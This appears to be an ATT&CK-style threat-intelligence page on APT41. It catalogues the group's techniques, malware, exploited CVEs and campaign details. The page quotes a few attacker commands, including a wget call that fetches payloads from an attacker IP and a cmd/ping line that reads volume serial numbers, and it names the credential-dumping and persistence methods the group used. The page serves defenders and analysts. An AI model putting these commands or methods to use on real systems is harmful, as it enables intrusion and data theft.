APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]

ID: G0096
Associated Groups: Wicked Panda
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 3.1
Created: 23 September 2019
Last Modified: 23 March 2023

Associated Group Descriptions

Name Description
Wicked Panda

[3]

Campaigns

Techniques Used

Domain ID Name Use
Enterprise T1134 Access Token Manipulation

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[4]

Enterprise T1098 Account Manipulation

APT41 has added user accounts to the User and Admin groups.[1]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[5]

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[4]

.002 Application Layer Protocol: File Transfer Protocols

APT41 used exploit payloads that initiate download via ftp.[5]

.004 Application Layer Protocol: DNS

APT41 used DNS for C2 communications.[1][2]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

APT41 created a RAR archive of targeted files for exfiltration.[1]

.003 Archive Collected Data: Archive via Custom Method

During C0017, APT41 hex-encoded PII data prior to exfiltration.[4]

Enterprise T1197 BITS Jobs

APT41 used BITSAdmin to download and install payloads.[5][3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[5]

Enterprise T1110 .002 Brute Force: Password Cracking

APT41 performed password brute-force attacks on the local admin account.[1]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT41 leveraged PowerShell to deploy malware families in victims’ environments.[1][5]

.003 Command and Scripting Interpreter: Windows Command Shell

APT41 used cmd.exe /c to execute commands on remote machines.[1]APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[5]

During C0017, APT41 used cmd.exe to execute reconnaissance commands.[4]

.004 Command and Scripting Interpreter: Unix Shell

APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.[5]

.007 Command and Scripting Interpreter: JavaScript

During C0017, APT41 deployed JScript web shells on compromised systems.[4]

Enterprise T1136 .001 Create Account: Local Account

APT41 has created user accounts.[1]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[5]

Enterprise T1486 Data Encrypted for Impact

APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1]

Enterprise T1005 Data from Local System

APT41 has uploaded files and data from a compromised host.[2]

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[4]

Enterprise T1001 .003 Data Obfuscation: Protocol Impersonation

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[4]

Enterprise T1074 .001 Data Staged: Local Data Staging

During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[4]

Enterprise T1140 Deobfuscate/Decode Files or Information

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[4]

Enterprise T1568 .002 Dynamic Resolution: Domain Generation Algorithms

APT41 has used DGAs to change their C2 servers monthly.[1]

Enterprise T1546 .008 Event Triggered Execution: Accessibility Features

APT41 leveraged sticky keys to establish persistence.[1]

Enterprise T1480 .001 Execution Guardrails: Environmental Keying

APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[6]

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[4]

Enterprise T1041 Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[4]

Enterprise T1567 Exfiltration Over Web Service

During C0017, APT41 used Cloudflare services for data exfiltration.[4]

Enterprise T1190 Exploit Public-Facing Application

APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[5]

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[4]

Enterprise T1203 Exploitation for Client Execution

APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1]

Enterprise T1068 Exploitation for Privilege Escalation

During C0017, APT41 abused named pipe impersonation for privilege escalation.[4]

Enterprise T1133 External Remote Services

APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1]

Enterprise T1008 Fallback Channels

APT41 used the Steam community page as a fallback mechanism for C2.[1]

Enterprise T1083 File and Directory Discovery

APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[5]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3]

.002 Hijack Execution Flow: DLL Side-Loading

APT41 used legitimate executables to perform DLL side-loading of their malware.[1]

.006 Hijack Execution Flow: Dynamic Linker Hijacking

APT41 has configured payloads to load via LD_PRELOAD.[3]

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[1]

.003 Indicator Removal: Clear Command History

APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1]

.004 Indicator Removal: File Deletion

APT41 deleted files from the system.[1]

Enterprise T1105 Ingress Tool Transfer

APT41 used certutil to download additional files.[5][3][2]

During C0017, APT41 downloaded malicious payloads onto compromised systems.[4]

Enterprise T1056 .001 Input Capture: Keylogging

APT41 used a keylogger called GEARSHIFT on a target system.[1]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

APT41 has created services to appear as benign system tools.[2]

During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[4]

.005 Masquerading: Match Legitimate Name or Location

APT41 attempted to masquerade their files as popular anti-virus software.[1][2]

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[4]

Enterprise T1112 Modify Registry

APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2]

Enterprise T1104 Multi-Stage Channels

APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[5]

Enterprise T1046 Network Service Discovery

APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1]

Enterprise T1135 Network Share Discovery

APT41 used the net share command as part of network reconnaissance.[1][2]

Enterprise T1027 Obfuscated Files or Information

APT41 used VMProtected binaries in multiple intrusions.[5]

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[4]

.002 Software Packing

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[4]

Enterprise T1588 .002 Obtain Capabilities: Tool

APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1]

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[4]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2]

.002 OS Credential Dumping: Security Account Manager

During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[4]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1]

Enterprise T1542 .003 Pre-OS Boot: Bootkit

APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1]

Enterprise T1055 Process Injection

APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1]

Enterprise T1090 Proxy

APT41 used a tool called CLASSFON to covertly proxy network communications.[1]

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[4]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

APT41 used RDP for lateral movement.[1][3]

.002 Remote Services: SMB/Windows Admin Shares

APT41 has transferred implant files using Windows Admin Shares.[3]

Enterprise T1496 Resource Hijacking

APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[1]

Enterprise T1014 Rootkit

APT41 deployed rootkits on Linux systems.[1][3]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT41 used a compromised account to create a scheduled task on a system.[1][3]

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[4]

Enterprise T1505 .003 Server Software Component: Web Shell

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[4]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1]

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT41 used compiled HTML (.chm) files for targeting.[1]

.011 System Binary Proxy Execution: Rundll32

APT41 has used rundll32.exe to execute a loader.[3]

Enterprise T1082 System Information Discovery

During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[4]

Enterprise T1016 System Network Configuration Discovery

APT41 collected MAC addresses from victim machines.[1][2]

During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[4]

Enterprise T1049 System Network Connections Discovery

APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[1][2]

Enterprise T1033 System Owner/User Discovery

APT41 used the WMIEXEC utility to execute whoami commands on remote machines.[1]

During C0017, APT41 used whoami to gather information from victim machines.[4]

Enterprise T1569 .002 System Services: Service Execution

APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[5][2]

Enterprise T1078 Valid Accounts

APT41 used compromised credentials to log on to other systems.[1][3]

Enterprise T1102 .001 Web Service: Dead Drop Resolver

APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1]

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[4]

Enterprise T1047 Windows Management Instrumentation

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2]

Software

ID Name References Techniques
S0073 ASPXSpy [1] Server Software Component: Web Shell
S0190 BITSAdmin [5] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0069 BLACKCOFFEE [1] Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Indicator Removal: File Deletion, Multi-Stage Channels, Process Discovery, Web Service: Dead Drop Resolver, Web Service: Bidirectional Communication
S0160 certutil [5] Archive Collected Data: Archive via Utility, Deobfuscate/Decode Files or Information, Ingress Tool Transfer, Subvert Trust Controls: Install Root Certificate
S0020 China Chopper [1] Application Layer Protocol: Web Protocols, Brute Force: Password Guessing, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, File and Directory Discovery, Indicator Removal: Timestomp, Ingress Tool Transfer, Network Service Discovery, Obfuscated Files or Information: Software Packing, Server Software Component: Web Shell
S0154 Cobalt Strike [5][2] Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, BITS Jobs, Browser Session Hijacking, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Protocol Impersonation, Data Transfer Size Limits, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Exploitation for Client Execution, Exploitation for Privilege Escalation, File and Directory Discovery, Hide Artifacts: Process Argument Spoofing, Impair Defenses: Disable or Modify Tools, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Network Service Discovery, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Office Application Startup: Office Template Macros, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Protocol Tunneling, Proxy: Domain Fronting, Proxy: Internal Proxy, Query Registry, Reflective Code Loading, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Scheduled Transfer, Screen Capture, Software Discovery, Subvert Trust Controls: Code Signing, System Binary Proxy Execution: Rundll32, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, Use Alternate Authentication Material: Pass the Hash, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Windows Management Instrumentation
S1052 DEADEYE [4] Command and Scripting Interpreter: Windows Command Shell, Deobfuscate/Decode Files or Information, Execution Guardrails, Hide Artifacts: NTFS File Attributes, Masquerading: Masquerade Task or Service, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Embedded Payloads, Scheduled Task/Job, System Binary Proxy Execution: Msiexec, System Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery
S0021 Derusbi [1] Audio Capture, Command and Scripting Interpreter: Unix Shell, Encrypted Channel: Symmetric Cryptography, Fallback Channels, File and Directory Discovery, Indicator Removal: Timestomp, Indicator Removal: File Deletion, Input Capture: Keylogging, Non-Application Layer Protocol, Non-Standard Port, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Screen Capture, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Owner/User Discovery, Video Capture
S0105 dsquery [4] Account Discovery: Domain Account, Domain Trust Discovery, Permission Groups Discovery: Domain Groups, System Information Discovery
S0363 Empire [3] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Credentials from Web Browsers, Domain Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0095 ftp [5] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0032 gh0st RAT [1] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Deobfuscate/Decode Files or Information, Dynamic Resolution: Fast Flux DNS, Encrypted Channel: Symmetric Cryptography, Encrypted Channel, Hijack Execution Flow: DLL Side-Loading, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Non-Application Layer Protocol, Process Discovery, Process Injection, Query Registry, Screen Capture, Shared Modules, System Binary Proxy Execution: Rundll32, System Information Discovery, System Services: Service Execution
S0100 ipconfig [2] System Network Configuration Discovery
S1051 KEYPLUG [4] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Non-Application Layer Protocol, Obfuscated Files or Information, Proxy, System Time Discovery, Web Service: Dead Drop Resolver
S0443 MESSAGETAP [7][3] Archive Collected Data: Archive via Custom Method, Automated Collection, Data Staged: Local Data Staging, Deobfuscate/Decode Files or Information, File and Directory Discovery, Indicator Removal: File Deletion, Network Sniffing, System Network Connections Discovery
S0002 Mimikatz [1][2] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Authentication Certificates, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0039 Net [1] Account Discovery: Domain Account, Account Discovery: Local Account, Create Account: Local Account, Create Account: Domain Account, Indicator Removal: Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, System Time Discovery
S0104 netstat [1] System Network Connections Discovery
S0385 njRAT [1] Application Layer Protocol: Web Protocols, Application Window Discovery, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Credentials from Password Stores: Credentials from Web Browsers, Data Encoding: Standard Encoding, Data from Local System, Dynamic Resolution: Fast Flux DNS, Exfiltration Over C2 Channel, File and Directory Discovery, Impair Defenses: Disable or Modify System Firewall, Indicator Removal: File Deletion, Indicator Removal: Clear Persistence, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Non-Standard Port, Obfuscated Files or Information, Obfuscated Files or Information: Compile After Delivery, Peripheral Device Discovery, Process Discovery, Query Registry, Remote Services: Remote Desktop Protocol, Remote System Discovery, Replication Through Removable Media, Screen Capture, System Information Discovery, System Owner/User Discovery, Video Capture
S0097 Ping [1][2] Remote System Discovery
S0013 PlugX [1] Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, File and Directory Discovery, Hide Artifacts: Hidden Files and Directories, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Ingress Tool Transfer, Input Capture: Keylogging, Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Native API, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information, Process Discovery, Query Registry, Screen Capture, System Network Connections Discovery, Trusted Developer Utilities Proxy Execution: MSBuild, Virtualization/Sandbox Evasion: System Checks, Web Service: Dead Drop Resolver
S0194 PowerSploit [1] Access Token Manipulation, Account Discovery: Local Account, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Create or Modify System Process: Windows Service, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Domain Trust Discovery, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: Path Interception by Search Order Hijacking, Input Capture: Keylogging, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Reflective Code Loading, Scheduled Task/Job: Scheduled Task, Screen Capture, Steal or Forge Kerberos Tickets: Kerberoasting, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Windows Management Instrumentation
S0006 pwdump [1] OS Credential Dumping: Security Account Manager
S0112 ROCKBOOT [1] Pre-OS Boot: Bootkit
S0596 ShadowPad [1][8] Application Layer Protocol: DNS, Application Layer Protocol: File Transfer Protocols, Application Layer Protocol: Web Protocols, Data Encoding: Non-Standard Encoding, Deobfuscate/Decode Files or Information, Dynamic Resolution: Domain Generation Algorithms, Indicator Removal, Ingress Tool Transfer, Modify Registry, Non-Application Layer Protocol, Obfuscated Files or Information: Fileless Storage, Obfuscated Files or Information, Process Discovery, Process Injection, Process Injection: Dynamic-link Library Injection, Scheduled Transfer, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery
S0430 Winnti for Linux [3] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, Ingress Tool Transfer, Non-Application Layer Protocol, Obfuscated Files or Information, Rootkit, Traffic Signaling
S0412 ZxShell [1] Access Token Manipulation: Create Process with Token, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, Command and Scripting Interpreter: Windows Command Shell, Create Account: Local Account, Create or Modify System Process: Windows Service, Data from Local System, Endpoint Denial of Service, Exploit Public-Facing Application, File and Directory Discovery, Impair Defenses: Disable or Modify System Firewall, Impair Defenses: Disable or Modify Tools, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Credential API Hooking, Input Capture: Keylogging, Modify Registry, Native API, Network Service Discovery, Non-Standard Port, Process Discovery, Process Injection: Dynamic-link Library Injection, Proxy, Query Registry, Remote Services: VNC, Remote Services: Remote Desktop Protocol, Screen Capture, System Binary Proxy Execution: Rundll32, System Information Discovery, System Owner/User Discovery, System Service Discovery, System Services: Service Execution, Video Capture

References